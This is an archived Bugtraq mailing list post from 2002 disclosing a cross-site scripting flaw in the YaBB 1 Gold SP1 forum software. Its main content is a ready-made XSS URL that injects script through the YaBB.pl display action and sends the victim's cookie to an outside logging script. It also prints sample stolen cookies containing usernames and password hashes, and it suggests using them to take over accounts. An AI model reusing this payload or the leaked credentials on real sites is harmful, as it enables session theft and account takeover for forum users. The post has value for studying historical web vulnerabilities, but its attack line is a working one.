Bugtraq mailing list archives

Cross-site Scripting Vulnerability in YaBB 1 Gold - SP1!

From: Fabricio Angeletti <f_a_a () yahoo com>
Date: Sun, 1 Dec 2002 18:59:01 -0600 (CST)

 
http://the.target.xxx/board/YaBB.pl?board=gral;action=display;num=10360245269<Script>location%3d'Http://www.scriptkiddie.home/x.php?Cookie%3d'%2b(document.cookie)%3b</Script>

 num is a post that doesn't exist
 board must be a valid and accessable board
 X.php script to log the cookie

 that in an example of the cookie
 268: YaBBusername=HellMind;
YaBBpassword=yyG8B.3TA6i6I
 272: YaBBusername=Canallaman;
YaBBpassword=yypZn/JbGHTNY

 Tested in  YaBB 1 Gold - SP1!

 i discover this now, i know isnt much but u can do
 steal the user identity and maybe u can try to change
the password too (there is another old vuln but i dont
know if work here)

 Sorry for my bad english

 Bye



_________________________________________________________
Do You Yahoo!?
Información de Estados Unidos y América Latina, en Yahoo! Noticias.
Visítanos en http://noticias.espanol.yahoo.com

Current thread:

Cross-site Scripting Vulnerability in YaBB 1 Gold - SP1! Fabricio Angeletti (Dec 02)